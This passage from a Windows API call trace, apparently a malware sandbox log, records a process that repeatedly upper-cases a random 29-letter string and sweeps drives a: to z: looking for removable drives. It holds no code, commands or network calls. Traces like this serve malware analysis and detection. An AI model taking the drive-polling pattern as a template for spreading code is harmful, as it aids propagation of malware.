hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0207.459] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0207.459] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0207.459] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0207.460] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0207.460] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0207.460] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0207.460] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0207.460] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0207.460] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0207.460] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0207.460] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0207.460] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0207.460] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0207.460] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0207.460] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0207.460] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0207.461] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0207.461] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0207.461] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0207.461] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0207.461] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0207.461] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0207.461] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0207.461] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0207.461] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0207.461] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0207.461] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0207.461] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0207.461] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0207.462] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0207.462] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0207.462] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0207.462] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0207.462] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0207.462] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0207.463] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0207.463] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0207.463] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0207.463] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0207.464] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0207.464] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0207.464] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0207.464] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0207.465] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0207.465] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0207.465] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0207.465] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0207.465] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0207.466] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0207.466] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0207.466] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0207.466] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0207.468] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0207.468] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0207.468] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0207.468] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0207.468] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0207.468] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0207.468] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0207.468] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0207.468] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0207.468] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0207.468] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0207.468] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0207.468] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0207.468] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0207.469] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0207.469] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0207.469] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0207.469] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0207.469] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326100 [0207.469] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0207.469] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0207.469] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0207.469] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0207.469] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326100 | out: hHeap=0x12c0000) returned 1 [0207.469] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0207.469] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0207.469] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e600 [0207.469] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0207.469] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e600 | out: hHeap=0x12c0000) returned 1 [0207.469] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0207.469] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0207.469] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0207.469] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0207.469] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0207.469] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0207.469] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0207.469] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0207.469] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0207.470] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0207.470] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0207.470] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0207.470] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0207.470] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0207.470] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0207.470] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0207.470] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0207.470] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0207.470] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0207.470] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0207.470] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0207.470] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0207.470] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0207.470] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec40 [0207.470] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0207.470] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0207.470] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0207.470] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0207.470] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0207.471] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0207.471] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0207.471] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0207.471] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0207.471] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0207.471] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0207.471] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0207.471] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0207.471] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0207.471] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0207.472] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0207.472] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0207.472] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0207.472] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0207.472] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0207.473] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0207.473] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0207.473] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0207.473] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0207.473] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0207.473] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0207.474] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0207.474] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0207.474] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0207.475] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0207.475] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0207.475] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0207.475] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0207.834] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0207.834] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0207.835] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0207.835] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0207.835] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0207.835] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0207.835] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0207.835] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0207.835] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0207.835] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0207.835] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0207.835] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0207.835] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0207.835] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0207.835] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0207.835] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0207.836] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0207.836] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0207.836] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0207.836] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326000 [0207.836] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0207.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0207.836] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0207.836] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0207.836] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326000 | out: hHeap=0x12c0000) returned 1 [0207.836] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0207.836] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0207.836] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0207.836] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0207.836] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0207.837] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0207.837] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0207.837] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0207.837] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0207.837] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0207.837] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0207.837] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0207.837] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0207.837] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0207.837] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0207.837] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0207.837] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0207.837] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0207.837] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0207.837] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0207.837] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0207.837] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0207.837] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0207.837] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0207.837] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0207.837] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0207.838] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0207.838] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0207.838] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0207.838] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0207.838] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0207.838] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0207.838] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0207.838] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0207.838] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0207.838] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0207.838] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0207.838] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0207.838] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0207.838] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0207.838] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0207.839] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0207.839] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0207.839] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0207.839] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0207.839] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0207.840] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0207.840] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0207.840] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0207.840] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0207.840] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0207.841] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0207.841] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0207.841] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0207.841] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0207.841] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0207.841] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0207.842] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0207.842] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0207.842] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0207.843] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0207.843] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0207.843] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0207.843] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0207.843] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0207.844] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0207.844] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0207.844] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0207.844] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0207.844] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0207.844] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0207.844] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0207.844] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0207.844] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0207.844] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0207.844] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0207.844] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0207.845] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0207.845] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0207.845] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0207.845] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0207.845] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e20 [0207.845] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0207.845] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0207.845] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0207.845] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0207.845] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e20 | out: hHeap=0x12c0000) returned 1 [0207.845] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0207.845] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0207.845] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0207.845] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0207.845] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0207.845] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0207.845] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0207.845] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0207.845] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 